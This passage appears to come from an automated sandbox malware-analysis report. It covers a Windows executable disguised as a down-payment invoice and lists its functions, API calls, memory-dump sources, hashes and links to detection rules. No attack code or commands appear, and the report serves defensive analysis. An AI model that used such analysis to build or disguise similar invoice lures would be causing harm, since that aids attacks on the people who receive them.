                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                                                                                                                      • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                                                                                                                      • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                                                                                                                      • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                                                                                                                      • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004032DE Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                                                                                                                        • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00005FA8,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FilePointer$CountTick
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1092082344-0
                                                                                                                                                                                                                      • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                                                                                                                                      • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004031D6 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                      • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                                                                                                                                      • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskD796.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3356406503-0
                                                                                                                                                                                                                      • Opcode ID: b0b49ade87f7b09473d7e2f987bdaf7adf2fb975b98445e66798791cf69e1e10
                                                                                                                                                                                                                      • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0b49ade87f7b09473d7e2f987bdaf7adf2fb975b98445e66798791cf69e1e10
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                      • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                                                                                                                      • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseDeleteValue
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2831762973-0
                                                                                                                                                                                                                      • Opcode ID: b705e755398730bcef2c4b74d43a9d26e90b86eebd6756a4a086da2d90cf2b5a
                                                                                                                                                                                                                      • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b705e755398730bcef2c4b74d43a9d26e90b86eebd6756a4a086da2d90cf2b5a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$EnableShow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1136574915-0
                                                                                                                                                                                                                      • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                                                                                                                                      • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004067C2 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                                        • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                                        • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                                        • Part of subcall function 00406752: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                                                                                      • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                                                      • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

